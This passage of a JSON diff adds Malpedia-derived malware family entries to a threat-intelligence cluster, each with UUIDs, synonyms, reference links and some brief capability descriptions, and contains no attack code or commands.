"37c357a1-ec09-449f-b5a9-c1ef1fba2de2", + "value": "IoT Reaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", + "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" + ] + }, + "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", + "value": "JenX", + "description": "" + }, + { + "meta": { + "synonyms": [ + "STD" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", + "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" + ] + }, + "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", + "value": "Kaiten", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", + "https://news.drweb.com/news/?i=10140&lng=en" + ] + }, + "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", + "value": "Lady", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", + "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + ] + }, + "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", + "value": "MiKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", + "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", + "http://osint.bambenekconsulting.com/feeds/", + "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", + "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", + "https://isc.sans.edu/diary/22786", + "https://github.com/jgamblin/Mirai-Source-Code", + "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", + "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", + "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/", + "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/" + ] + }, + "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", + "value": "Moose", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", + "https://news.drweb.com/?i=5760&c=23&lng=en" + ] + }, + "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", + "value": "MrBlack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", + "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", + "https://twitter.com/ankit_anubhav/status/1019647993547550720", + "https://twitter.com/360Netlab/status/1019759516789821441", + "https://twitter.com/hrbrmstr/status/1019922651203227653", + "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", + "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", + "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" + ] + }, + "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", + "value": "Owari", + "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", + "https://twitter.com/juanandres_gs/status/944741575837528064" + ] + }, + "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", + "value": "Penquin Turla", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", + "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" + ] + }, + "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", + "value": "Persirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", + "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" + ] + }, + "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", + "value": "r2r2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", + "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" + ] + }, + "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", + "value": "Rakos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", + "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", + "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" + ] + }, + "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", + "value": "Rex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", + "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", + "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", + "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", + "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", + "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", + "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" + ] + }, + "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", + "value": "Satori", + "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", + "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" + ] + }, + "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", + "value": "ShellBind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", + "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" + ] + }, + "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", + "value": "Shishiga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", + "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + ] + }, + "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", + "value": "Spamtorte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" + ] + }, + "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", + "value": "SSHDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + ] + }, + "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", + "value": "Stantinko", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", + "https://blog.avast.com/new-torii-botnet-threat-research" + ] + }, + "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", + "value": "Torii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", + "http://paper.seebug.org/345/" + ] + }, + "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", + "value": "Trump Bot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "http://get.cyberx-labs.com/radiation-report" + ] + }, + "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", + "value": "Tsunami", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" + ] + }, + "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", + "value": "Turla RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Espeon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", + "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" + ] + }, + "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", + "value": "Umbreon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", + "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://blog.talosintelligence.com/2018/05/VPNFilter.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", + "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" + ] + }, + "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", + "value": "elf.vpnfilter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + ] + }, + "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", + "value": "elf.wellmess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", + "https://twitter.com/michalmalik/status/846368624147353601" + ] + }, + "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", + "value": "Xaynnalc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + ] + }, + "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", + "value": "XOR DDoS", + "description": "Linux DDoS C&C Malware" + }, + { + "meta": { + "synonyms": [ + "darlloz" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", + "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" + ] + }, + "uuid": "9218630d-0425-4b18-802c-447a9322990d", + "value": "Zollard", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", + "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" + ] + }, + "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", + "value": "GuiInject", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": "WireLurker", + "description": "The iOS malware that is installed over USB by osx.wirelurker" + }, + { + "meta": { + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "http://malware-traffic-analysis.net/2017/07/04/index.html", + "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + ] + }, + "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", + "value": "AdWind", + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + }, + { + "meta": { + "synonyms": [ + "Trupto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", + "value": "CrossRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jacksbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://github.com/java-rat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", + "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" + ] + }, + "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", + "value": "jRAT", + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", + "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" + ] + }, + "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", + "value": "jSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", + "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", + "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" + ] + }, + "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", + "value": "Qarallax RAT", + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + }, + { + "meta": { + "synonyms": [ + "Quaverse RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", + "https://www.digitrustgroup.com/java-rat-qrat/", + "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" + ] + }, + "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", + "value": "QRat", + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", + "https://github.com/shotskeber/Ratty" + ] + }, + "uuid": "da032a95-b02a-4af2-b563-69f686653af4", + "value": "Ratty", + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + ] + }, + "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", + "value": "AIRBREAK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" + ] + }, + "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", + "value": "Bateleur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", + "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", + "https://twitter.com/JohnLaTwC/status/983011262731714565" + ] + }, + "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", + "value": "CryptoNight", + "description": "WebAssembly-based crpyto miner." + }, + { + "meta": { + "synonyms": [ + "Roblox Trade Assist" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", + "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" + ] + }, + "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", + "value": "CukieGrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", + "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" + ] + }, + "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", + "value": "KopiLuwak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" + ] + }, + "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", + "value": "magecart", + "description": "" + }, + { + "meta": { + "synonyms": [ + "SpicyOmelette" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://blog.morphisec.com/cobalt-gang-2.0" + ] + }, + "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", + "value": "More_eggs", + "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", + "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" + ] + }, + "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", + "value": "Powmet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", + "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "http://resources.infosecinstitute.com/scanbox-framework/" + ] + }, + "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", + "value": "scanbox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" + ] + }, + "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", + "value": "HTML5 Encoding", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", + "https://twitter.com/JohnLaTwC/status/915590893155098629" + ] + }, + "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", + "value": "Maintools.js", + "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", + "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef", + "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f" + ] + }, + "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", + "value": "Unidentified 050 (APT32 Profiler)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" + ] + }, + "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", + "value": "witchcoven", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", + "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/", + "https://github.com/kai5263499/Bella", + "https://github.com/kai5263499/Bella" + ] + }, + "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", + "value": "Bella", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mask", + "Appetite" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", + "value": "Careto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" + ] + }, + "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", + "value": "CoinThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", + "https://objective-see.com/blog/blog_0x2A.html" + ] + }, + "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", + "value": "Coldroot RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", + "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" + ] + }, + "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", + "value": "CpuMeaner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", + "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", + "https://digitasecurity.com/blog/2018/02/05/creativeupdater/", + "https://objective-see.com/blog/blog_0x29.html" + ] + }, + "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", + "value": "CreativeUpdater", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" + ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", + "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" + ] + }, + "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", + "value": "Crossrider", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", + "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", + "https://www.f-secure.com/weblog/archives/00002466.html" + ] + }, + "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", + "value": "Dockster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", + "https://objective-see.com/blog/blog_0x32.html" + ] + }, + "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", + "value": "Dummy", + 